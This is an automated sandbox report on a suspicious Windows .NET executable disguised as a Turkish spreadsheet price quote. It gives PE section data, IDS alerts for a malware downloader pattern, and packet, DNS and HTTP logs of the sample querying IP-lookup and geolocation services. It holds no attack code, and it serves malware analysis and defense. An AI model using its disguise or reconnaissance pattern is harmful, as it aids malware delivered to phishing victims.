Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x81fe8	0x82000	b6aac65f8cef87291dd8ed3c636704bf	False	0.982012469951923	data	7.9844464661439245	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x84000	0x1494	0x1600	89e77872be6567ebff125f9ddba42418	False	0.5209517045454546	data	5.835549468857186	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x86000	0xc	0x200	15701709f8d4f1e3edd8efb24fdc0f1e	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x84160	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	0.4595375722543353
RT_ICON	0x846c8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	0.6818592057761733
RT_GROUP_ICON	0x84f70	0x22	data	0.9411764705882353
RT_VERSION	0x84f94	0x314	data	0.4352791878172589
RT_MANIFEST	0x852a8	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-07T17:09:59.833995+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49733	132.226.247.73	80	TCP
2024-10-07T17:10:01.396396+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49733	132.226.247.73	80	TCP
2024-10-07T17:10:02.190033+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49736	188.114.97.3	443	TCP
2024-10-07T17:10:08.537022+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49738	132.226.247.73	80	TCP
2024-10-07T17:10:13.163208+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49745	188.114.97.3	443	TCP
2024-10-07T17:10:16.548399+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49753	188.114.97.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 7, 2024 17:09:58.893683910 CEST	49733	80	192.168.2.4	132.226.247.73
Oct 7, 2024 17:09:58.898807049 CEST	80	49733	132.226.247.73	192.168.2.4
Oct 7, 2024 17:09:58.898884058 CEST	49733	80	192.168.2.4	132.226.247.73
Oct 7, 2024 17:09:58.899132013 CEST	49733	80	192.168.2.4	132.226.247.73
Oct 7, 2024 17:09:58.903950930 CEST	80	49733	132.226.247.73	192.168.2.4
Oct 7, 2024 17:09:59.553520918 CEST	80	49733	132.226.247.73	192.168.2.4
Oct 7, 2024 17:09:59.586082935 CEST	49733	80	192.168.2.4	132.226.247.73
Oct 7, 2024 17:09:59.590888977 CEST	80	49733	132.226.247.73	192.168.2.4
Oct 7, 2024 17:09:59.788018942 CEST	80	49733	132.226.247.73	192.168.2.4
Oct 7, 2024 17:09:59.833995104 CEST	49733	80	192.168.2.4	132.226.247.73
Oct 7, 2024 17:09:59.835736990 CEST	49734	443	192.168.2.4	188.114.97.3
Oct 7, 2024 17:09:59.835786104 CEST	443	49734	188.114.97.3	192.168.2.4
Oct 7, 2024 17:09:59.835849047 CEST	49734	443	192.168.2.4	188.114.97.3
Oct 7, 2024 17:09:59.842309952 CEST	49734	443	192.168.2.4	188.114.97.3
Oct 7, 2024 17:09:59.842335939 CEST	443	49734	188.114.97.3	192.168.2.4
Oct 7, 2024 17:10:00.289200068 CEST	443	49734	188.114.97.3	192.168.2.4
Oct 7, 2024 17:10:00.289282084 CEST	49734	443	192.168.2.4	188.114.97.3
Oct 7, 2024 17:10:00.346041918 CEST	49734	443	192.168.2.4	188.114.97.3
Oct 7, 2024 17:10:00.346071959 CEST	443	49734	188.114.97.3	192.168.2.4
Oct 7, 2024 17:10:00.347187042 CEST	443	49734	188.114.97.3	192.168.2.4
Oct 7, 2024 17:10:00.396450996 CEST	49734	443	192.168.2.4	188.114.97.3
Oct 7, 2024 17:10:00.616491079 CEST	49734	443	192.168.2.4	188.114.97.3
Oct 7, 2024 17:10:00.663413048 CEST	443	49734	188.114.97.3	192.168.2.4
Oct 7, 2024 17:10:00.727868080 CEST	443	49734	188.114.97.3	192.168.2.4
Oct 7, 2024 17:10:00.728084087 CEST	443	49734	188.114.97.3	192.168.2.4
Oct 7, 2024 17:10:00.728185892 CEST	49734	443	192.168.2.4	188.114.97.3
Oct 7, 2024 17:10:00.764044046 CEST	49734	443	192.168.2.4	188.114.97.3
Oct 7, 2024 17:10:00.809875965 CEST	49733	80	192.168.2.4	132.226.247.73
Oct 7, 2024 17:10:00.815131903 CEST	80	49733	132.226.247.73	192.168.2.4
Oct 7, 2024 17:10:01.355998039 CEST	80	49733	132.226.247.73	192.168.2.4
Oct 7, 2024 17:10:01.358458042 CEST	49736	443	192.168.2.4	188.114.97.3
Oct 7, 2024 17:10:01.358469009 CEST	443	49736	188.114.97.3	192.168.2.4
Oct 7, 2024 17:10:01.358532906 CEST	49736	443	192.168.2.4	188.114.97.3
Oct 7, 2024 17:10:01.358861923 CEST	49736	443	192.168.2.4	188.114.97.3
Oct 7, 2024 17:10:01.358874083 CEST	443	49736	188.114.97.3	192.168.2.4
Oct 7, 2024 17:10:01.396395922 CEST	49733	80	192.168.2.4	132.226.247.73
Oct 7, 2024 17:10:01.859036922 CEST	443	49736	188.114.97.3	192.168.2.4
Oct 7, 2024 17:10:01.860758066 CEST	49736	443	192.168.2.4	188.114.97.3
Oct 7, 2024 17:10:01.860785961 CEST	443	49736	188.114.97.3	192.168.2.4
Oct 7, 2024 17:10:02.189836025 CEST	443	49736	188.114.97.3	192.168.2.4
Oct 7, 2024 17:10:02.189903975 CEST	443	49736	188.114.97.3	192.168.2.4
Oct 7, 2024 17:10:02.189985037 CEST	49736	443	192.168.2.4	188.114.97.3
Oct 7, 2024 17:10:02.190474987 CEST	49736	443	192.168.2.4	188.114.97.3
Oct 7, 2024 17:10:02.194329023 CEST	49733	80	192.168.2.4	132.226.247.73
Oct 7, 2024 17:10:02.195506096 CEST	49738	80	192.168.2.4	132.226.247.73
Oct 7, 2024 17:10:02.199752092 CEST	80	49733	132.226.247.73	192.168.2.4
Oct 7, 2024 17:10:02.199836969 CEST	49733	80	192.168.2.4	132.226.247.73
Oct 7, 2024 17:10:02.200494051 CEST	80	49738	132.226.247.73	192.168.2.4
Oct 7, 2024 17:10:02.200577021 CEST	49738	80	192.168.2.4	132.226.247.73
Oct 7, 2024 17:10:02.200686932 CEST	49738	80	192.168.2.4	132.226.247.73
Oct 7, 2024 17:10:02.205636978 CEST	80	49738	132.226.247.73	192.168.2.4
Oct 7, 2024 17:10:08.488967896 CEST	80	49738	132.226.247.73	192.168.2.4
Oct 7, 2024 17:10:08.490753889 CEST	49739	443	192.168.2.4	188.114.97.3
Oct 7, 2024 17:10:08.490801096 CEST	443	49739	188.114.97.3	192.168.2.4
Oct 7, 2024 17:10:08.490890980 CEST	49739	443	192.168.2.4	188.114.97.3
Oct 7, 2024 17:10:08.491141081 CEST	49739	443	192.168.2.4	188.114.97.3
Oct 7, 2024 17:10:08.491149902 CEST	443	49739	188.114.97.3	192.168.2.4
Oct 7, 2024 17:10:08.537022114 CEST	49738	80	192.168.2.4	132.226.247.73
Oct 7, 2024 17:10:08.968897104 CEST	443	49739	188.114.97.3	192.168.2.4
Oct 7, 2024 17:10:08.971049070 CEST	49739	443	192.168.2.4	188.114.97.3
Oct 7, 2024 17:10:08.971066952 CEST	443	49739	188.114.97.3	192.168.2.4
Oct 7, 2024 17:10:09.122014046 CEST	443	49739	188.114.97.3	192.168.2.4
Oct 7, 2024 17:10:09.122282028 CEST	443	49739	188.114.97.3	192.168.2.4
Oct 7, 2024 17:10:09.122385979 CEST	49739	443	192.168.2.4	188.114.97.3
Oct 7, 2024 17:10:09.122935057 CEST	49739	443	192.168.2.4	188.114.97.3
Oct 7, 2024 17:10:09.127690077 CEST	49740	80	192.168.2.4	132.226.247.73
Oct 7, 2024 17:10:09.132668018 CEST	80	49740	132.226.247.73	192.168.2.4
Oct 7, 2024 17:10:09.132857084 CEST	49740	80	192.168.2.4	132.226.247.73
Oct 7, 2024 17:10:09.132950068 CEST	49740	80	192.168.2.4	132.226.247.73
Oct 7, 2024 17:10:09.137720108 CEST	80	49740	132.226.247.73	192.168.2.4
Oct 7, 2024 17:10:11.193090916 CEST	80	49740	132.226.247.73	192.168.2.4
Oct 7, 2024 17:10:11.194324970 CEST	49741	443	192.168.2.4	188.114.97.3
Oct 7, 2024 17:10:11.194382906 CEST	443	49741	188.114.97.3	192.168.2.4
Oct 7, 2024 17:10:11.194453955 CEST	49741	443	192.168.2.4	188.114.97.3
Oct 7, 2024 17:10:11.194727898 CEST	49741	443	192.168.2.4	188.114.97.3
Oct 7, 2024 17:10:11.194742918 CEST	443	49741	188.114.97.3	192.168.2.4
Oct 7, 2024 17:10:11.240199089 CEST	49740	80	192.168.2.4	132.226.247.73
Oct 7, 2024 17:10:11.763314009 CEST	443	49741	188.114.97.3	192.168.2.4
Oct 7, 2024 17:10:11.764667988 CEST	49741	443	192.168.2.4	188.114.97.3
Oct 7, 2024 17:10:11.764714956 CEST	443	49741	188.114.97.3	192.168.2.4
Oct 7, 2024 17:10:11.899167061 CEST	443	49741	188.114.97.3	192.168.2.4
Oct 7, 2024 17:10:11.899238110 CEST	443	49741	188.114.97.3	192.168.2.4
Oct 7, 2024 17:10:11.899435043 CEST	49741	443	192.168.2.4	188.114.97.3
Oct 7, 2024 17:10:11.899986982 CEST	49741	443	192.168.2.4	188.114.97.3
Oct 7, 2024 17:10:11.903845072 CEST	49740	80	192.168.2.4	132.226.247.73
Oct 7, 2024 17:10:11.904875040 CEST	49743	80	192.168.2.4	132.226.247.73
Oct 7, 2024 17:10:11.909161091 CEST	80	49740	132.226.247.73	192.168.2.4
Oct 7, 2024 17:10:11.909224987 CEST	49740	80	192.168.2.4	132.226.247.73
Oct 7, 2024 17:10:11.909723997 CEST	80	49743	132.226.247.73	192.168.2.4
Oct 7, 2024 17:10:11.909795046 CEST	49743	80	192.168.2.4	132.226.247.73
Oct 7, 2024 17:10:11.909898043 CEST	49743	80	192.168.2.4	132.226.247.73
Oct 7, 2024 17:10:11.914761066 CEST	80	49743	132.226.247.73	192.168.2.4
Oct 7, 2024 17:10:12.558393955 CEST	80	49743	132.226.247.73	192.168.2.4
Oct 7, 2024 17:10:12.559510946 CEST	49745	443	192.168.2.4	188.114.97.3
Oct 7, 2024 17:10:12.559551001 CEST	443	49745	188.114.97.3	192.168.2.4
Oct 7, 2024 17:10:12.559673071 CEST	49745	443	192.168.2.4	188.114.97.3
Oct 7, 2024 17:10:12.560018063 CEST	49745	443	192.168.2.4	188.114.97.3
Oct 7, 2024 17:10:12.560031891 CEST	443	49745	188.114.97.3	192.168.2.4
Oct 7, 2024 17:10:12.599555969 CEST	49743	80	192.168.2.4	132.226.247.73
Oct 7, 2024 17:10:13.012352943 CEST	443	49745	188.114.97.3	192.168.2.4
Oct 7, 2024 17:10:13.030164003 CEST	49745	443	192.168.2.4	188.114.97.3
Oct 7, 2024 17:10:13.030230999 CEST	443	49745	188.114.97.3	192.168.2.4
Oct 7, 2024 17:10:13.163249016 CEST	443	49745	188.114.97.3	192.168.2.4
Oct 7, 2024 17:10:13.163527012 CEST	443	49745	188.114.97.3	192.168.2.4
Oct 7, 2024 17:10:13.163650990 CEST	49745	443	192.168.2.4	188.114.97.3
Oct 7, 2024 17:10:13.180617094 CEST	49745	443	192.168.2.4	188.114.97.3
Oct 7, 2024 17:10:13.238096952 CEST	49743	80	192.168.2.4	132.226.247.73
Oct 7, 2024 17:10:13.241206884 CEST	49746	80	192.168.2.4	132.226.247.73
Oct 7, 2024 17:10:13.243447065 CEST	80	49743	132.226.247.73	192.168.2.4
Oct 7, 2024 17:10:13.244059086 CEST	49743	80	192.168.2.4	132.226.247.73
Oct 7, 2024 17:10:13.246592999 CEST	80	49746	132.226.247.73	192.168.2.4
Oct 7, 2024 17:10:13.246670008 CEST	49746	80	192.168.2.4	132.226.247.73
Oct 7, 2024 17:10:13.247279882 CEST	49746	80	192.168.2.4	132.226.247.73
Oct 7, 2024 17:10:13.253211975 CEST	80	49746	132.226.247.73	192.168.2.4
Oct 7, 2024 17:10:13.926199913 CEST	80	49746	132.226.247.73	192.168.2.4
Oct 7, 2024 17:10:13.927983999 CEST	49749	443	192.168.2.4	188.114.97.3
Oct 7, 2024 17:10:13.928023100 CEST	443	49749	188.114.97.3	192.168.2.4
Oct 7, 2024 17:10:13.928093910 CEST	49749	443	192.168.2.4	188.114.97.3
Oct 7, 2024 17:10:13.928683996 CEST	49749	443	192.168.2.4	188.114.97.3
Oct 7, 2024 17:10:13.928697109 CEST	443	49749	188.114.97.3	192.168.2.4
Oct 7, 2024 17:10:13.974545956 CEST	49746	80	192.168.2.4	132.226.247.73
Oct 7, 2024 17:10:14.371305943 CEST	443	49749	188.114.97.3	192.168.2.4
Oct 7, 2024 17:10:14.382148981 CEST	49749	443	192.168.2.4	188.114.97.3
Oct 7, 2024 17:10:14.382173061 CEST	443	49749	188.114.97.3	192.168.2.4
Oct 7, 2024 17:10:14.523231983 CEST	443	49749	188.114.97.3	192.168.2.4
Oct 7, 2024 17:10:14.523504019 CEST	443	49749	188.114.97.3	192.168.2.4
Oct 7, 2024 17:10:14.523598909 CEST	49749	443	192.168.2.4	188.114.97.3
Oct 7, 2024 17:10:14.524357080 CEST	49749	443	192.168.2.4	188.114.97.3
Oct 7, 2024 17:10:14.529284954 CEST	49746	80	192.168.2.4	132.226.247.73
Oct 7, 2024 17:10:14.530081034 CEST	49751	80	192.168.2.4	132.226.247.73
Oct 7, 2024 17:10:14.534982920 CEST	80	49746	132.226.247.73	192.168.2.4
Oct 7, 2024 17:10:14.535054922 CEST	80	49751	132.226.247.73	192.168.2.4
Oct 7, 2024 17:10:14.535140038 CEST	49746	80	192.168.2.4	132.226.247.73
Oct 7, 2024 17:10:14.535178900 CEST	49751	80	192.168.2.4	132.226.247.73
Oct 7, 2024 17:10:14.535293102 CEST	49751	80	192.168.2.4	132.226.247.73
Oct 7, 2024 17:10:14.540227890 CEST	80	49751	132.226.247.73	192.168.2.4
Oct 7, 2024 17:10:15.210855007 CEST	80	49751	132.226.247.73	192.168.2.4
Oct 7, 2024 17:10:15.214610100 CEST	49753	443	192.168.2.4	188.114.97.3
Oct 7, 2024 17:10:15.214715004 CEST	443	49753	188.114.97.3	192.168.2.4
Oct 7, 2024 17:10:15.214824915 CEST	49753	443	192.168.2.4	188.114.97.3
Oct 7, 2024 17:10:15.215164900 CEST	49753	443	192.168.2.4	188.114.97.3
Oct 7, 2024 17:10:15.215202093 CEST	443	49753	188.114.97.3	192.168.2.4
Oct 7, 2024 17:10:15.255816936 CEST	49751	80	192.168.2.4	132.226.247.73
Oct 7, 2024 17:10:16.381922007 CEST	443	49753	188.114.97.3	192.168.2.4
Oct 7, 2024 17:10:16.394987106 CEST	49753	443	192.168.2.4	188.114.97.3
Oct 7, 2024 17:10:16.395081997 CEST	443	49753	188.114.97.3	192.168.2.4
Oct 7, 2024 17:10:16.548418045 CEST	443	49753	188.114.97.3	192.168.2.4
Oct 7, 2024 17:10:16.548636913 CEST	443	49753	188.114.97.3	192.168.2.4
Oct 7, 2024 17:10:16.548738956 CEST	49753	443	192.168.2.4	188.114.97.3
Oct 7, 2024 17:10:16.549196959 CEST	49753	443	192.168.2.4	188.114.97.3
Oct 7, 2024 17:10:16.552817106 CEST	49751	80	192.168.2.4	132.226.247.73
Oct 7, 2024 17:10:16.554083109 CEST	49754	80	192.168.2.4	132.226.247.73
Oct 7, 2024 17:10:16.558094978 CEST	80	49751	132.226.247.73	192.168.2.4
Oct 7, 2024 17:10:16.558176041 CEST	49751	80	192.168.2.4	132.226.247.73
Oct 7, 2024 17:10:16.558995962 CEST	80	49754	132.226.247.73	192.168.2.4
Oct 7, 2024 17:10:16.559077978 CEST	49754	80	192.168.2.4	132.226.247.73
Oct 7, 2024 17:10:16.559155941 CEST	49754	80	192.168.2.4	132.226.247.73
Oct 7, 2024 17:10:16.564030886 CEST	80	49754	132.226.247.73	192.168.2.4
Oct 7, 2024 17:10:18.200720072 CEST	80	49754	132.226.247.73	192.168.2.4
Oct 7, 2024 17:10:18.200891972 CEST	80	49754	132.226.247.73	192.168.2.4
Oct 7, 2024 17:10:18.200922012 CEST	80	49754	132.226.247.73	192.168.2.4
Oct 7, 2024 17:10:18.201116085 CEST	80	49754	132.226.247.73	192.168.2.4
Oct 7, 2024 17:10:18.201131105 CEST	49754	80	192.168.2.4	132.226.247.73
Oct 7, 2024 17:10:18.201132059 CEST	49754	80	192.168.2.4	132.226.247.73
Oct 7, 2024 17:10:18.201246977 CEST	49754	80	192.168.2.4	132.226.247.73
Oct 7, 2024 17:10:18.202466965 CEST	49755	443	192.168.2.4	188.114.97.3
Oct 7, 2024 17:10:18.202526093 CEST	443	49755	188.114.97.3	192.168.2.4
Oct 7, 2024 17:10:18.202611923 CEST	49755	443	192.168.2.4	188.114.97.3
Oct 7, 2024 17:10:18.202961922 CEST	49755	443	192.168.2.4	188.114.97.3
Oct 7, 2024 17:10:18.202980995 CEST	443	49755	188.114.97.3	192.168.2.4
Oct 7, 2024 17:10:18.655720949 CEST	443	49755	188.114.97.3	192.168.2.4
Oct 7, 2024 17:10:18.668437004 CEST	49755	443	192.168.2.4	188.114.97.3
Oct 7, 2024 17:10:18.668473959 CEST	443	49755	188.114.97.3	192.168.2.4
Oct 7, 2024 17:10:18.812329054 CEST	443	49755	188.114.97.3	192.168.2.4
Oct 7, 2024 17:10:18.812542915 CEST	443	49755	188.114.97.3	192.168.2.4
Oct 7, 2024 17:10:18.812643051 CEST	49755	443	192.168.2.4	188.114.97.3
Oct 7, 2024 17:10:18.813261032 CEST	49755	443	192.168.2.4	188.114.97.3
Oct 7, 2024 17:11:13.619934082 CEST	80	49738	132.226.247.73	192.168.2.4
Oct 7, 2024 17:11:13.620011091 CEST	49738	80	192.168.2.4	132.226.247.73
Oct 7, 2024 17:11:22.230371952 CEST	80	49754	132.226.247.73	192.168.2.4
Oct 7, 2024 17:11:22.231466055 CEST	49754	80	192.168.2.4	132.226.247.73
Oct 7, 2024 17:11:58.209356070 CEST	49754	80	192.168.2.4	132.226.247.73
Oct 7, 2024 17:11:58.214484930 CEST	80	49754	132.226.247.73	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 7, 2024 17:09:58.507757902 CEST	50534	53	192.168.2.4	1.1.1.1
Oct 7, 2024 17:09:58.869668961 CEST	53	50534	1.1.1.1	192.168.2.4
Oct 7, 2024 17:09:59.827219009 CEST	49966	53	192.168.2.4	1.1.1.1
Oct 7, 2024 17:09:59.835100889 CEST	53	49966	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 7, 2024 17:09:58.507757902 CEST	192.168.2.4	1.1.1.1	0xe9f5	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Oct 7, 2024 17:09:59.827219009 CEST	192.168.2.4	1.1.1.1	0x36af	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 7, 2024 17:09:58.869668961 CEST	1.1.1.1	192.168.2.4	0xe9f5	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 7, 2024 17:09:58.869668961 CEST	1.1.1.1	192.168.2.4	0xe9f5	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Oct 7, 2024 17:09:58.869668961 CEST	1.1.1.1	192.168.2.4	0xe9f5	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Oct 7, 2024 17:09:58.869668961 CEST	1.1.1.1	192.168.2.4	0xe9f5	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Oct 7, 2024 17:09:58.869668961 CEST	1.1.1.1	192.168.2.4	0xe9f5	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Oct 7, 2024 17:09:58.869668961 CEST	1.1.1.1	192.168.2.4	0xe9f5	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Oct 7, 2024 17:09:59.835100889 CEST	1.1.1.1	192.168.2.4	0x36af	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 7, 2024 17:09:59.835100889 CEST	1.1.1.1	192.168.2.4	0x36af	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49733	132.226.247.73	80	6308	C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 17:09:58.899132013 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 7, 2024 17:09:59.553520918 CEST	320	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 15:09:59 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 61f80298d3cc2abbcaa67efdbc194650 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 7, 2024 17:09:59.586082935 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 7, 2024 17:09:59.788018942 CEST	320	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 15:09:59 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: d12ebb309a7be96bc4ff4be724a7adc1 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 7, 2024 17:10:00.809875965 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 7, 2024 17:10:01.355998039 CEST	320	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 15:10:01 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 7bd4fddef2426e064e87c22231943891 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49738	132.226.247.73	80	6308	C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 17:10:02.200686932 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 7, 2024 17:10:08.488967896 CEST	320	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 15:10:08 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 23e10ff37266f603b2e39710bd9e904d Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49740	132.226.247.73	80	6308	C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 17:10:09.132950068 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 7, 2024 17:10:11.193090916 CEST	320	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 15:10:11 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: fea91336ec62d46d855b672511ed4a35 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49743	132.226.247.73	80	6308	C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 17:10:11.909898043 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 7, 2024 17:10:12.558393955 CEST	320	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 15:10:12 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: dd73e4bd7fb2de385ea91134597622f2 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49746	132.226.247.73	80	6308	C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 17:10:13.247279882 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
